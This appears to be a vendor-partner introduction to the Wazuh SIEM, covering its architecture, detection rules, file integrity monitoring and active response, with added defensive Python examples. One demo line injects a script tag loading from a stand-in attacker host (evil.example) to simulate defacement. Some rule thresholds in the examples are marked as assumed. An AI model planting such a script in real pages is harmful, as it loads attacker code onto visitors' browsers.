CYBER SECURITY · BUCHS SG
WAZUH · TECHNICAL INTRODUCTION
WAZUH / ARCHITECTURE & COMPONENTS

An open-source XDR & SIEM, explained for the people who will actually deploy it.

A walk-through of the Wazuh stack — agents, server, indexer, dashboard — and where it sits inside a Blue-Team Operations stack. Built for integration partners.
One step ahead of the attackers.

Agent (endpoint) → Server (analysis) → Indexer (storage) → Dashboard (UI / API)
MAY 2026 · IVAN STRICKER · T-ALPHA GMBH

What is Wazuh?

A free, open-source unified XDR + SIEM platform. Wazuh consolidates host-based intrusion detection, log management, file integrity monitoring, vulnerability detection, configuration assessment and active response — into a single agent and central analytics plane. No per-EPS or per-GB licensing.

4 CORE COMPONENTS
Agent · Server · Indexer · Dashboard
4,000+ DETECTION RULES
Built-in, MITRE ATT&CK mapped
PLATFORMS
Linux · Windows · macOS · AIX · Solaris · HP-UX · Docker · K8s · AWS · Azure · GCP
0 € LICENSING
No per-EPS or per-GB charges. Open source: the Wazuh server, agent and ruleset are GPLv2; the indexer and dashboard are OpenSearch derivatives under Apache 2.0.
SOURCE
wazuh.com — official documentation

Wazuh as the central XDR/SIEM in an open-source stack

Wazuh sits at the centre. Suricata feeds it network events; TheHive orchestrates the incidents that come out of it; Cortex analyses observables; MISP shares IOCs back upstream, where Wazuh can match them against incoming events.

Four core components, one continuous data flow

A packet of telemetry travels from endpoint to operator screen in five hops.

Wazuh Agent (endpoint collection) → Wazuh Server (decode + rules) → Wazuh Indexer (storage + search) → Dashboard (visualisation + API)

  1. Agent collects logs, FIM events and host telemetry on the endpoint.
  2. Encrypted upload to the server over TCP 1514 (AES-256 by default, Blowfish optional).
  3. Server decodes, applies the ruleset and raises alerts (severity 0–15).
  4. Filebeat ships alerts to the Indexer over TLS (TCP 9200).
  5. Dashboard renders data and drives the platform via the REST API (TCP 55000).

Central element — analyses every event and triggers alerts

01 Agent Registration (authd · TCP 1515): enrols new agents and distributes authentication keys.
02 Agent Connection (TCP 1514): receives agent data and validates the agent's identity.
03 Analysis Engine (analysisd): decoders + rules drive event identification and processing.
04 RESTful API (TCP 55000): programmatic interface to the Wazuh control plane.
05 Cluster Daemon (TCP 1516): horizontal scaling in multi-node configurations.
06 Filebeat + Threat Intel (filebeat · IOC match): forwards alerts to the Indexer and matches IOCs against intel feeds.

Storage, search and the operator interface

INDEXER
OpenSearch · 9200/TCP
  • Stores all alerts and events from the server
  • Real-time full-text search over security data
  • RESTful API on TCP 9200
  • Cluster transport on TCP 9300–9400
  • Horizontally scalable (multi-node)
DASHBOARD
HTTPS · 443/TCP
  • Visualization — built-in dashboards: PCI DSS, GDPR, CIS, HIPAA, NIST 800-53
  • Agent management — monitor, configure and upgrade agents
  • Developer tooling — ruleset test, API console, custom views

Cross-platform agents, eight built-in modules

Linux · Windows · macOS · Solaris · AIX · HP-UX. Plus container and cloud collectors. Agentless monitoring is supported via Syslog, SSH or API integration for appliances and unsupported OS targets.

  • Log Collector: OS and application logs.
  • FIM: file integrity monitoring.
  • Rootcheck: rootkit and anomaly detection.
  • SCA: configuration assessment.
  • Syscollector: hardware / software inventory.
  • Active Response: automated countermeasures.
  • Docker / K8s: container security.
  • Cloud Modules: AWS · Azure · GCP.

Agent Grouping Model — how configuration is layered

DEFAULT
Baseline configuration applied to every agent enrolled in the manager.
GROUP
Logical sets — linux-prod, windows-dc, dmz. One agent can belong to many groups.
AGENT-SPECIFIC
Per-host overrides. Used sparingly to keep config maintainable.
PRACTICAL RULE
Prefer groups. They give you targeted configuration without per-host drift, and they make rollbacks straightforward.
INSIDE THE ENGINE

Detection mechanics

Log analysis pipeline, decoders, rules, FIM, Active Response, Vulnerability Detection and SCA — the building blocks your team will work with day-to-day.

From raw event to enriched, MITRE-mapped alert

  1. Collect: Log Collector ingests raw data (syslog, Windows Event Log, application logs).
  2. Pre-decode: extracts the standard fields timestamp, hostname and program name.
  3. Decode: regex breaks the event into structured fields (srcip, user, action).
  4. Rule match: the engine matches decoded fields against 4,000+ rules (Wazuh + custom).
  5. Alert: severity 0–15, MITRE ATT&CK mapping, structured payload to the Indexer.
demo · SSH brute-force detection
input:   sshd[1234]: Failed password for root from 192.168.1.50 port 22
decoder: sshd
rule:    5763 (level 10): repeated authentication failures from the same source within the timeframe
MITRE:   T1110 Brute Force
! ALERT raised · forwarded to Indexer · severity 10
TIP
Severity ≥ 7 typically goes to the SOC; ≥ 12 wakes someone up.

How partners typically extend Wazuh for client-specific applications

DECODER local_decoder.xml
<decoder name="myapp">
  <program_name>myapp</program_name>
  <regex>User (\S+) logged in from (\S+)</regex>
  <order>user, srcip</order>
</decoder>
RULE local_rules.xml
<rule id="100001" level="5">
  <decoded_as>myapp</decoded_as>
  <description>User Login via myapp</description>
  <group>authentication_success,</group>
</rule>
VALIDATE INTERACTIVELY wazuh-logtest
$ /var/ossec/bin/wazuh-logtest
> Apr  1 12:00:00 web01 myapp[4321]: User admin logged in from 10.0.0.5
 decoder: myapp | rule 100001 (level 5): User Login via myapp
Decoders extract structured fields from raw logs
Rules define conditions and severity
wazuh-logtest validates without a restart; feed it the full syslog line so the pre-decoder can set program_name
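Worked example for the pipeline demo above and for the myapp decoder/rule pair (added here; not Wazuh code and not from the original page): a small Python re-implementation of pre-decode → decode → rule match → frequency correlation, run over constructed syslog lines. Assumed rather than taken from the page: the 5763 thresholds (frequency 8, timeframe 120 s, same source IP), which follow the default sshd ruleset as I recall it, and clearing the window after a fire, which stands in for Wazuh's `ignore` attribute.

```python
import re
from collections import defaultdict, deque

# Pre-decoder: the syslog header analysisd strips before the message reaches
# the decoders (timestamp, hostname, program_name[pid]).
SYSLOG_RE = re.compile(
    r"^(?P<timestamp>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<hostname>\S+) "
    r"(?P<program_name>[^\s\[:]+)(?:\[\d+\])?: (?P<message>.*)$"
)

# Decoders keyed by <program_name>; tuple = (<regex>, <order>).
DECODERS = {
    "sshd": (re.compile(r"^Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"),
             ("user", "srcip")),
    "myapp": (re.compile(r"^User (\S+) logged in from (\S+)"),
              ("user", "srcip")),
}

# Rules mirroring the XML attributes on the page. The 5763 thresholds are an
# assumption based on the default sshd ruleset; verify against the sshd rules
# file under /var/ossec/ruleset/rules/ on your manager.
RULES = [
    {"id": 5760, "level": 5, "decoded_as": "sshd",
     "description": "sshd: authentication failed."},
    {"id": 5763, "level": 10, "if_matched_sid": 5760, "frequency": 8,
     "timeframe": 120, "same_source_ip": True, "mitre": ["T1110"],
     "description": "sshd: brute force trying to get access to the system."},
    {"id": 100001, "level": 5, "decoded_as": "myapp",
     "description": "User Login via myapp"},
]


class Analysisd:
    """Minimal analysisd: pre-decode, decode, base-rule match, frequency correlation."""

    def __init__(self, rules=RULES, decoders=DECODERS):
        self.decoders = decoders
        self.base = [r for r in rules if "decoded_as" in r]
        self.composite = [r for r in rules if "if_matched_sid" in r]
        # (rule id, srcip) -> arrival times of matching parent events
        self.windows = defaultdict(deque)

    def decode(self, raw):
        """Pre-decode the syslog header, then run the decoder for program_name."""
        hdr = SYSLOG_RE.match(raw)
        if not hdr:
            return None
        event = hdr.groupdict()
        if event["program_name"] in self.decoders:
            regex, order = self.decoders[event["program_name"]]
            m = regex.search(event["message"])
            if m:
                event["decoder"] = event["program_name"]
                event.update(zip(order, m.groups()))
        return event

    def process(self, raw, now):
        """Return the highest-level alert for one log line, or None.

        `now` is the arrival time in seconds: analysisd correlates on receive
        time, not on the syslog timestamp (which carries no year).
        """
        event = self.decode(raw)
        if not event or "decoder" not in event:
            return None
        fired = next((r for r in self.base if r["decoded_as"] == event["decoder"]), None)
        if fired is None:
            return None
        # Frequency rules: N parent matches from the same srcip inside timeframe.
        for comp in self.composite:
            if comp["if_matched_sid"] != fired["id"]:
                continue
            key = (comp["id"], event.get("srcip") if comp.get("same_source_ip") else None)
            win = self.windows[key]
            win.append(now)
            while win and now - win[0] > comp["timeframe"]:
                win.popleft()
            if len(win) >= comp["frequency"]:
                win.clear()  # simplification: Wazuh rate-limits with the 'ignore' attribute
                fired = comp
                break
        return {"rule_id": fired["id"], "level": fired["level"],
                "description": fired["description"], "mitre": fired.get("mitre", []),
                "user": event.get("user"), "srcip": event.get("srcip")}


def demo():
    """Constructed input: 8 failed root logins from one IP, then one myapp login."""
    engine = Analysisd()
    ssh_alerts = [
        engine.process(
            f"Apr  1 12:00:{i:02d} web01 sshd[1234]: Failed password for root "
            f"from 192.168.1.50 port 22 ssh2", now=i)
        for i in range(8)
    ]
    app_alert = engine.process(
        "Apr  1 12:01:00 web01 myapp[4321]: User admin logged in from 10.0.0.5", now=60)
    return ssh_alerts, app_alert


if __name__ == "__main__":
    ssh, app = demo()
    for a in ssh + [app]:
        print(f"rule {a['rule_id']} (level {a['level']}): {a['description']} "
              f"user={a['user']} srcip={a['srcip']} mitre={a['mitre']}")
```

Run it directly to print the nine alerts: the first seven SSH failures surface as rule 5760 (level 5), the eighth from the same source escalates to 5763 (level 10, T1110), and the myapp line lands on 100001 with user and srcip decoded. The real engine also suppresses the lower-level alert once the frequency rule fires; that is reproduced here by returning only the highest-level rule per event.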

Detect tampering, web-shells and unauthorised changes

How FIM works

  • Baseline scan computes SHA-256 hashes of monitored files.
  • Periodic or real-time scans detect changes.
  • Compares: content, permissions, owner, size.
  • On change: alert with diff and affected file path.
CONFIG ossec.conf
<syscheck>
  <frequency>600</frequency>                         <!-- scheduled scan every 10 min -->
  <directories realtime="yes">/etc,/usr/bin</directories>
  <directories realtime="yes" report_changes="yes">/var/www/html</directories>  <!-- realtime + diffs for the web root -->
</syscheck>
REAL-WORLD EXAMPLE web-shell detection
  1. Attacker drops /var/www/html/backdoor.php
  2. FIM detects the new file in real time (the web root is monitored with realtime="yes") and raises rule 554 (file added, level 5 by default)
  3. Alert carries SHA-256 hash, owner, timestamp and full path
  4. SOC isolates the file immediately, without waiting for the next scan window
level 5 · rule 554 · 9f1a…d0c4 · /var/www/html/backdoor.php
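To show what the baseline-and-compare loop above actually does, here is an added Python example (not Wazuh's syscheck code and not from the original page) that snapshots a directory, then diffs a second snapshot into alert-like records. The rule ids and levels (554 added / level 5, 553 deleted / level 7, 550 checksum changed / level 7) are assumed from the default ossec ruleset; the web root, its files and the placeholder "web shell" are constructed for the demo.

```python
import hashlib
import os
import stat
import tempfile


def _attrs(path):
    """Attributes syscheck records per file; every one of them is compared on each scan."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "perm": oct(stat.S_IMODE(st.st_mode)), "uid": st.st_uid, "gid": st.st_gid}


def snapshot(root):
    """Baseline scan: relative path -> attributes for every regular file under root."""
    entries = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(path).st_mode):
                entries[os.path.relpath(path, root)] = _attrs(path)
    return entries


def compare(baseline, current):
    """Diff two snapshots and emit alert-like records in path order.

    Rule ids/levels are assumed from the default ruleset: 554 added (5),
    553 deleted (7), 550 checksum changed (7). Check them in your local ruleset.
    """
    alerts = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            alerts.append({"rule_id": 554, "level": 5, "event": "added",
                           "path": path, **current[path]})
        elif path not in current:
            alerts.append({"rule_id": 553, "level": 7, "event": "deleted", "path": path})
        elif baseline[path] != current[path]:
            changed = [k for k in current[path] if current[path][k] != baseline[path][k]]
            alerts.append({"rule_id": 550, "level": 7, "event": "modified",
                           "path": path, "changed": changed, **current[path]})
    return alerts


# Constructed, inert placeholder standing in for a dropped web shell.
WEBSHELL = b"<?php echo 'constructed web-shell placeholder'; ?>\n"


def demo():
    """Constructed web root: baseline, then a dropped file and a defaced index."""
    with tempfile.TemporaryDirectory() as root:
        index = os.path.join(root, "index.html")
        with open(index, "wb") as f:
            f.write(b"<h1>welcome</h1>\n")
        baseline = snapshot(root)
        with open(os.path.join(root, "backdoor.php"), "wb") as f:
            f.write(WEBSHELL)
        with open(index, "ab") as f:
            f.write(b"<script src=//evil.example/x.js></script>\n")
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for a in demo():
        print(f"rule {a['rule_id']} level {a['level']} {a['event']:8} {a['path']} "
              f"{a.get('sha256', '')[:8]}")
```

The interesting part is the `changed` list on a modified file: a content change moves both `sha256` and `size`, a `chmod` moves only `perm`, and a `chown` moves only `uid`/`gid`, which is exactly the distinction an analyst needs when triaging a FIM alert on a web root.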

Automated containment on the affected endpoint

Event → Decode → Rule match → AR trigger → Action
CAPABILITIES
  • Built-in scripts: firewall-drop, host-deny, disable-account
  • Custom scripts supported (Bash, Python, PowerShell)
  • Configurable: timeout, specific rules, local vs server-side execution
  • Self-undoing — IP blocks lift automatically when the timeout expires
EXAMPLE — FIREWALL-DROP
ossec.conf
<active-response>
  <command>firewall-drop</command>
  <location>local</location>
  <rules_id>5763</rules_id>     <!-- SSH brute force -->
  <timeout>600</timeout>          <!-- 10-min block -->
</active-response>
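As an added example (not one of Wazuh's shipped scripts and not from the original page), here is what a custom active-response script looks like under the JSON-on-stdin protocol Wazuh 4.x uses for the `add` (block) and `delete` (timeout expired) phases. The script name `block-ip`, the constructed alert message and the chains touched are assumptions; the message shape and the `check_keys`/`continue` handshake follow the Wazuh 4 active-response documentation as I understand it, so check it against your version before deploying.

```python
#!/usr/bin/env python3
"""Custom Wazuh active-response script (added example; hypothetical name 'block-ip').

analysisd writes one JSON line on stdin: command 'add' when the rule fires and
'delete' when <timeout> expires. For 'add' the script must echo a 'check_keys'
message and wait for 'continue' before acting (handshake assumed from Wazuh 4.x docs).
"""
import ipaddress
import json
import subprocess
import sys

NAME = "block-ip"

# Constructed sample of the 'add' message (shape assumed from the Wazuh 4.x docs).
SAMPLE_ADD = json.dumps({
    "version": 1,
    "origin": {"name": "node01", "module": "wazuh-analysisd"},
    "command": "add",
    "parameters": {
        "extra_args": [],
        "alert": {"rule": {"id": "5763", "level": 10, "description": "sshd: brute force"},
                  "data": {"srcip": "192.168.1.50", "dstuser": "root"}},
        "program": "/var/ossec/active-response/bin/block-ip.py",
    },
})


def parse_message(line):
    """Return (command, alert) from the JSON analysisd writes to stdin."""
    msg = json.loads(line)
    if msg.get("version") != 1 or msg.get("command") not in ("add", "delete"):
        raise ValueError(f"unexpected active-response message: {msg!r}")
    return msg["command"], msg["parameters"]["alert"]


def pick_srcip(alert):
    """Extract the offending IP; reject garbage and addresses that would lock us out."""
    raw = alert.get("data", {}).get("srcip")
    if not raw:
        raise ValueError("alert carries no data.srcip")
    ip = ipaddress.ip_address(raw)  # ValueError on anything that is not an IP literal
    if ip.is_loopback or ip.is_unspecified or ip.is_link_local:
        raise ValueError(f"refusing to block {ip}")
    return str(ip)


def is_blockable(alert):
    """True if pick_srcip() would accept the alert, False otherwise."""
    try:
        pick_srcip(alert)
        return True
    except ValueError:
        return False


def build_commands(command, ip):
    """argv lists to run: insert the DROP rules on 'add', remove them on 'delete'."""
    tool = "ip6tables" if ipaddress.ip_address(ip).version == 6 else "iptables"
    flag = "-I" if command == "add" else "-D"
    return [[tool, flag, chain, "-s", ip, "-j", "DROP"] for chain in ("INPUT", "FORWARD")]


def main():
    command, alert = parse_message(sys.stdin.readline())
    ip = pick_srcip(alert)
    if command == "add":
        # Handshake: tell analysisd which key we act on and wait for continue/abort.
        sys.stdout.write(json.dumps({
            "version": 1,
            "origin": {"name": NAME, "module": "active-response"},
            "command": "check_keys",
            "parameters": {"keys": [ip]},
        }) + "\n")
        sys.stdout.flush()
        reply = json.loads(sys.stdin.readline())
        if reply.get("command") != "continue":
            return 0
    for argv in build_commands(command, ip):
        subprocess.run(argv, check=True)
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

To wire it in, register the script in the manager's ossec.conf as a `<command>` with `<name>block-ip</name>`, `<executable>block-ip.py</executable>` and `<timeout_allowed>yes</timeout_allowed>`, then reference `<command>block-ip</command>` from an `<active-response>` block like the firewall-drop one above. With `<location>local</location>` the file must exist, executable, under /var/ossec/active-response/bin/ on every agent. The `ipaddress` parse is the important safety check: `srcip` comes from a decoded log line, so anything that is not an IP literal (including shell metacharacters) is rejected before it reaches a command.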

Agent-based — no separate network scanner required

  1. Syscollector: inventory of packages, OS and kernel
  2. CVE match: NVD · Canonical · Red Hat · Microsoft
  3. Alert: CVE id, CVSS score, fix version
REPORTED: openssl 1.1.1k installed on web-prod-04
DETECTED: CVE-2024-5535 · CVSS 9.1 · alert level 13
REMEDIATE: upgrade to a patched OpenSSL build; the 1.1.1 branch is end-of-life, so plan the move to a supported 3.x release

Automated checks against hardening benchmarks

CIS-aligned

Built on CIS Benchmarks plus your own policies (YAML).

Local execution

Agent runs the checks locally and reports pass/fail to the server.

1,000+ checks

Pre-built checks for Linux, Windows and macOS.

Compliance mapping

PCI DSS · HIPAA · NIST 800-53 · GDPR.

CIS BENCHMARK Ubuntu 22.04 LTS: 82% pass · 11% fail · 7% n/a
Failed checks include:
  • disable IPv4 redirects
  • audit log permissions
  • password reuse policy

All inter-component traffic is encrypted (AES-256 / TLS)

Source      Destination   Port            Protocol   Purpose
Agent       Manager       1514/TCP        AES-256    Event ingestion (default)
Agent       Manager       1515/TCP        TLS        Agent enrollment / authd
Manager     Manager       1516/TCP        AES-256    Cluster daemon
Manager     Indexer       9200/TCP        TLS        Filebeat alert ingest
Indexer     Indexer       9300–9400/TCP   TLS        Cluster transport
Dashboard   Manager       55000/TCP       TLS        REST API (control plane)
User        Dashboard     443/TCP         HTTPS      Web interface
RULE OF THUMB
Open only what's needed per direction. Place the dashboard behind your reverse proxy or VPN — never expose 55000 to the internet.

Pick the model that fits the customer's scale

01

All-in-One

All components on one server. Lab and small environments.

02

Distributed

Components on dedicated servers. Flexibility and scale.

03

Docker / Kubernetes

Container-based deployment. Cattle, not pets.

04

Wazuh Cloud (SaaS)

Managed service. No infrastructure of your own.

All-in-One sizing — 90-day retention

Agents     EPS     CPU        RAM     Storage (90 d)
≤ 25       100     4 vCPU     8 GB    50 GB
≤ 100      500     8 vCPU     16 GB   200 GB
≤ 500      2,500   16 vCPU    32 GB   1 TB
≤ 1,000    5,000   16+ vCPU   64 GB   2 TB → distribute

All-in-one in three commands

Partner-grade installs need more, but this is the fastest path to a working environment.

ALL-IN-ONE INSTALLER ubuntu / debian
$ sudo apt update && sudo apt upgrade -y
$ curl -sO https://packages.wazuh.com/4.12/wazuh-install.sh
$ sudo bash ./wazuh-install.sh -a

Configuration paths

  • /var/ossec/etc/ossec.conf: main XML configuration
  • /var/ossec/etc/rules/local_rules.xml: custom rules (the stock ruleset lives under /var/ossec/ruleset/rules/)
  • /var/ossec/etc/decoders/local_decoder.xml: custom decoders (stock decoders under /var/ossec/ruleset/decoders/)

ossec.conf sits at the same path on manager and agent; rules and decoders exist only on the manager.

After installation

  • Dashboard at https://<IP>:443
  • Login: admin + generated password
  • Save wazuh-install-files.tar in your vault
  • Set the timezone (timedatectl set-timezone)

Agent deployment (Linux)

$ curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH \
    | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import
$ chmod 644 /usr/share/keyrings/wazuh.gpg
$ echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main" | tee /etc/apt/sources.list.d/wazuh.list
$ apt-get update && WAZUH_MANAGER="<manager-ip>" WAZUH_AGENT_GROUP="linux-prod" apt-get install -y wazuh-agent
$ systemctl daemon-reload && systemctl enable --now wazuh-agent

Deployment variables (WAZUH_MANAGER, WAZUH_AGENT_GROUP, WAZUH_REGISTRATION_PASSWORD, WAZUH_AGENT_NAME) are read by the package post-install and auto-enrol the agent; without them you edit ossec.conf and register by hand. Importing the key into your personal GPG keyring does nothing for apt, which only trusts the keyring named in signed-by.

What to take away

  1. Wazuh — free, open-source XDR + SIEM platform.
  2. Four core components: Agent · Server · Indexer · Dashboard.
  3. Analysis pipeline: Decoder → Rules → Alerts (4,000+ rules out of the box).
  4. Modules: FIM, Active Response, Vulnerability Detection, SCA, Cloud, Containers.
  5. Encrypted communication (AES-256 / TLS) on every link.
  6. Compliance built in: PCI DSS, GDPR, HIPAA, NIST 800-53, CIS.
WHO YOU'RE WORKING WITH

One step ahead of the attackers.

Independent, owner-led Swiss cybersecurity practice based in Buchs SG. Open-source first. Hands-on Blue Team and Red Team work — no vendor lock-in, no management overhead. We sell neither hardware nor software, so the results are entirely neutral.

BLUE TEAM
Wazuh deployments, custom decoders & rules, SIEM operations
RED TEAM
Penetration tests, vulnerability assessments, security checks
CONSULTING
Security concepts, awareness trainings, automation-first
FOUNDERS
David Dutler
CEO & CO-FOUNDER
Ivan Stricker
CTO & CO-FOUNDER
NEXT STEPS
  • Walk through a live Wazuh environment together
  • Pick one customer scenario to model end-to-end
  • Define what each side brings — tooling, support, escalation